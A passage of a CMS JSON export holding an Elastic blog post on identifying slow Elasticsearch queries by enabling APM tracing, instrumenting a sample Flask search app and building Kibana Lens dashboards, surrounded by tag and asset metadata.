models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltd0a6414db19c04af","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-14T04:11:00.160Z","updated_at":"2023-08-14T04:11:00.160Z","content_type":"image/jpeg","file_size":"120139","filename":"19-feather.jpeg","title":"19-feather.jpeg","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-14T04:11:10.324Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd0a6414db19c04af/64d9a954ba11e76c2c18bb72/19-feather.jpeg"},"title":"Identify slow queries in generative AI search experiences","title_l10n":"Identify slow queries in generative AI search experiences","updated_at":"2025-01-21T22:32:13.580Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/slow-queries-generative-ai-search-experiences","publish_details":{"time":"2025-01-21T22:32:21.167Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2999c96d6bf0cc4d","_version":19,"locale":"en-us","ACL":{},"abstract_l10n":"Master the art of troubleshooting slow Elasticsearch queries for better user experience, and learn how to optimize query performance by using APM insights and Lens charts.","author":["bltfb64482fc825a009"],"category":["blte5cc8450a098ce5e"],"created_at":"2023-08-03T16:40:30.797Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"callout":{"title_l10n":"","_metadata":{"uid":"cs72ece05bf0deedf1"},"paragraph_l10n":"","callout_reference":["bltbce8bba79c5e743a"],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2752936498222897"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor anyone using Elasticsearch®\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e as their search engine, identifying and troubleshooting queries is a crucial skill to master. Be it ecommerce, observability, or workplace-oriented search solutions, a slow Elasticsearch will negatively impact your user’s experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo pinpoint slow Elasticsearch queries, you can use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-slowlog.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eslow log\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which captures the query run at a certain threshold. Setting the slow log threshold correctly is a challenge in and of itself. For example, a query that takes 500 milliseconds under full load might be acceptable, but the same query under low load might be unacceptable. The slow log does not differentiate and logs everything above 500 milliseconds. Slow log does its job very well, so you can capture different levels of granularity depending on the threshold value. Tracing, instead, can look at all queries, identifying how many of your queries are within certain thresholds.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eApplication performance monitoring (APM) is no longer confined to just your application. Using instrumentation in Elasticsearch, we can now add Elasticsearch as a fully fledged service rather than a dependency on your application stack. This way, we get a more nuanced view of performance than the slow log can provide.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor the following example, our data corpus is the \u003c/span\u003e\u003ca href=\"https://paperswithcode.com/dataset/openwebtext\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOpenWebText\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which provides roughly 40GB of pure text and roughly 8 million individual documents that run locally on an M1 Max Macbook with 32GB RAM.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Getting started","_metadata":{"uid":"cs06f95e7b21cb8089"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eActivating tracing in Elasticsearch is done with static settings (configured in the \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e) and dynamic settings, which can be toggled during runtime using a \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ePUT _cluster/settings\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e command, where one of those dynamic settings is the sampling rate. Some settings, like the sampling rate, can be toggled during the runtime. In the \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e we want to set the following:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eValid for Version 9.x\u003c/span\u003e\u003c/p\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5b0d1a2b7ca7139b"}}},{"code":{"code":"telemetry.agent.enabled: true\ntelemetry.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"csff35af0b1c5f68d4"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csfb8bf5049802bbb8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eValid for Version 7.x and 8.x\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csae42418053e46201"}}},{"code":{"code":"tracing.apm.enabled: true\ntracing.apm.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"cs670836919bdada06"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs92d6e6e2dac9306b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eThe secret token (or API key) must be in the Elasticsearch keystore. The keystore tool should be available in \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cstrong\u003e\u0026lt;your elasticsearch install directory\u0026gt;/bin/elasticsearch-keystore\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e using the following command for version 7.x and 8.x \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch-keystore add tracing.apm.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e or \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003etracing.apm.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eFor version 9.x please use \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e instead. \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eAfter that, you need to restart Elasticsearch. More information on tracing can be found in our \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/blob/main/TRACING.md\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etracing document\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOnce APM is active we can look at the APM view in Kibana and see that Elasticsearch captures various REST API endpoints automatically. Here, we focus mainly on the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ePOST /{index}/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e calls and see what we can gain from it.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd0fdd009e2f6c3a5"}}},{"image":{"image":{"uid":"bltfa39389057047940","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T17:03:25.663Z","updated_at":"2023-08-03T17:03:25.663Z","content_type":"image/png","file_size":"292255","filename":"elastic-blog-1-elasticsearch.png","title":"elastic-blog-1-elasticsearch.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:22.898Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfa39389057047940/64cbdddde237e92994f7cf14/elastic-blog-1-elasticsearch.png"},"_metadata":{"uid":"cs764e3595dd185b5f"},"caption_l10n":"","alt_text_l10n":"elasticsearch screenshot","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs948eb722e77065b7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy examining a simple query directly on the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eGET /{index}/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e box, we see the following waterfall breakdown. This contains internal spans that provide deeper insights into what Elasticsearch is doing under the hood. And we see the overall duration of this search (86 milliseconds).\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csab19a9deb53e133b"}}},{"image":{"image":{"uid":"blt80bd48de316a2c2a","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T17:03:44.652Z","updated_at":"2023-08-03T17:03:44.652Z","content_type":"image/png","file_size":"105820","filename":"elastic-blog-2-trace-sample.png","title":"elastic-blog-2-trace-sample.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:22.924Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt80bd48de316a2c2a/64cbddf0c5b4be1719a6e5d9/elastic-blog-2-trace-sample.png"},"_metadata":{"uid":"cse69537eba6ee95ec"},"caption_l10n":"","alt_text_l10n":"trace sample","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs407d1c4554234bf6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe metadata accompanying the query includes extensive information around the HTTP header, user agent, Elasticsearch node location (cloud provider metadata, hostname, container info), some system information, and URL details. Using some basic transaction information, we can create a Lens chart that plots the average transaction duration and allows us to see if there is an upward or downward trend.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Our search application","_metadata":{"uid":"cs313060e955231133"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt is nice not needing to use slow logs anymore! I can determine the transaction duration and identify how many searches are answered beneath any threshold. However, there is one setback — Elasticsearch does not capture the query sent, so we know that a query took a long time, but we don’t know what the query was.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet’s instrument a sample search application. In this case, we will use a simple Flask app with two routes, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esearch_single\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esearch_phrase\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, which will represent a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ematch\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ematch_phrase\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e query in Elasticsearch. For example, we could use the following queries:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1d99e68f5dba0eb2"}}},{"code":{"code":"{\n \"query\": {\n \"match\": {\n \"content\": \"support\"\n }\n }\n}\nAnd\n{\n \"query\": {\n \"match_phrase\": {\n \"content\": \"support protest\"\n }\n }\n}","_metadata":{"uid":"cs55b6e5a01a86319c"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5300ced56aacc400"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe following Flask code implements the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esearch_single\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e route. The \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esearch_phrase\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e is very similar, except it uses \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ematch_phrase\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e instead of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ematch\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8a862f5950e1dd07"}}},{"code":{"code":"@app.route(\"/search_single\", methods=[\"GET\"])\ndef search_single():\n query = request.args.get(\"q\", \"\")\n if not query.strip():\n return jsonify({\"error\": \"No search query provided\"}), 400\n try:\n result = es.search(\n index=ES_INDEX, query={\"match\": {\"content\": query}}\n )\n\n hits = result[\"hits\"][\"hits\"]\n response = []\n for hit in hits:\n response.append(\n {\n \"score\": hit[\"_score\"],\n \"content\": hit[\"_source\"][\"content\"],\n }\n )\n \n return jsonify(response)","_metadata":{"uid":"cs0aa31682dee15097"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbf3311542a84c697"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith all that prepared, I can now call \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ecurl -XGET \"http://localhost:5000/search_single?q='microphone'\"\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to search for the term \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003emicrophone\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe mainly add APM to our search application to observe, but our APM agents capture outgoing requests and enrich them with metadata information. In our case, the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003espan.db.statement\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e contains the Elasticsearch query. And in this case below, someone searched for \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ewindow\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs547c9dc1a3252df5"}}},{"image":{"image":{"uid":"blt4ee78bc9ef844d1d","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T17:06:21.240Z","updated_at":"2023-08-03T17:06:21.240Z","content_type":"image/png","file_size":"97453","filename":"elastic-blog-3-span-details.png","title":"elastic-blog-3-span-details.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:22.950Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4ee78bc9ef844d1d/64cbde8dcc97f6d00e6e5d3b/elastic-blog-3-span-details.png"},"_metadata":{"uid":"csc48c49ba93aa7b91"},"caption_l10n":"","alt_text_l10n":"span details","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Piecing it all together","_metadata":{"uid":"cs4ae59d077ea5d0f3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn my Flask service, I set the query size to 5,000, meaning that Elasticsearch should give me up to 5,000 matching documents in a single JSON response. That is a large number, and much of the time is spent retrieving that amount of documents from the disk. After changing it to the top 100 documents, I can quickly identify what happened in my dashboard by comparing it.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLooking at a transaction in the APM view and activating the labs function for the critical path creates an overlay, showing us where our application is spending its time.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs16f1ae09dedbd07c"}}},{"image":{"image":{"uid":"blt9dfc2f0f88c50a6a","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T17:06:59.950Z","updated_at":"2023-08-03T17:06:59.950Z","content_type":"image/png","file_size":"106819","filename":"elastic-blog-4-apm-view.png","title":"elastic-blog-4-apm-view.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:22.978Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9dfc2f0f88c50a6a/64cbdeb3ddc0266c4c80763e/elastic-blog-4-apm-view.png"},"_metadata":{"uid":"cs48121274a61bdf51"},"caption_l10n":"","alt_text_l10n":"apm view timeline","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa42d0c24467c14a8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter that, I created a dashboard using the fields \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.duration.us\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ees_query_took\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. General KQL filters contain \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eservice.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eprocessor.event: transaction\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.name: POST /{index}/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSide tip:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e go to data view management \u0026gt; select your data view containing the APM data streams \u0026gt; select the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.duration.us\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field \u0026gt; and change the format to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eduration\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. It will automatically render it now in human-readable output instead of microseconds.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeveraging the Lens annotation feature, we can see in the middle Lens that the change to 100 docs brought down the average search transaction by a lot. Not only that, look at the overall count of records in the top right corner. Since we can search faster, we have a higher throughput! I really enjoy histograms, so I created one in the middle in the top row, where I have the transaction duration on the X-axis and the count of records on the Y-axis. Furthermore, APM delivers metrics, so we can identify how much CPU% usage is occurring at any time as well as JVM heap, non-heap usage, thread count, and more useful information.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs32802cb82a155940"}}},{"image":{"image":{"uid":"blt26b693f12ad19c7b","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T17:07:27.640Z","updated_at":"2023-08-03T17:07:27.640Z","content_type":"image/png","file_size":"390775","filename":"elastic-blog-5-graphs-charts.png","title":"elastic-blog-5-graphs-charts.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:23.003Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt26b693f12ad19c7b/64cbdecf5de99c810668d188/elastic-blog-5-graphs-charts.png"},"_metadata":{"uid":"cs98c81971192a3214"},"caption_l10n":"","alt_text_l10n":"graphs and charts","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Conclusion","_metadata":{"uid":"cs488137586b5bf4a4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis blog post showed you how important it is to have Elasticsearch as an instrumented application and identify bottlenecks much more easily. Also, you can use the transaction duration as a metric for anomaly detection, do A/B testing for your application, and never wonder again if Elasticsearch feels faster since you now have data to answer that question. Furthermore, all the metadata that is collected from user agents to queries help you to troubleshoot.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe dashboards and data view can be imported from \u003c/span\u003e\u003ca href=\"https://github.com/philippkahr/blogs/tree/main/apm-instrumentation-of-elastic-stack/elasticsearch-slow-queries\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs37963415983a3cf9"}}},{"callout":{"title_l10n":"Warning","_metadata":{"uid":"csb4bc93b1ceb365be"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere is an issue with the duration of transactions inside Elasticsearch. This is \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/pull/98113\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003efixed\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in the upcoming release of 8.9.1. Until then, the transactions use the wrong clock, which disturbs the overall duration.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csccd5fb516f817174"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs091436563fe104f6"}}}],"publish_date":"2023-08-07","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt540a0685025a17e0","ACL":{},"created_at":"2021-07-12T21:52:31.396Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"workplace-search","label_l10n":"Workplace Search","tags":[],"title":"Workplace Search","updated_at":"2021-07-12T21:52:31.396Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.010Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc2c6579373c53341","ACL":{},"created_at":"2021-07-12T21:53:13.753Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2021-07-12T21:53:13.753Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.194Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt920fd113a20929a5","ACL":{},"created_at":"2023-11-06T20:38:46.745Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ecommerce-search","label_l10n":"Ecommerce search","tags":[],"title":"Ecommerce search","updated_at":"2023-11-06T20:38:46.745Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.165Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt76a8a9e2ae891569","ACL":{},"created_at":"2023-11-06T21:35:06.844Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tracing","label_l10n":"Tracing","tags":[],"title":"Tracing","updated_at":"2023-11-06T21:35:06.844Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.748Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","uid":"bltf38f037a2b6ecb4e","title":"Log monitoring","label_l10n":"Log 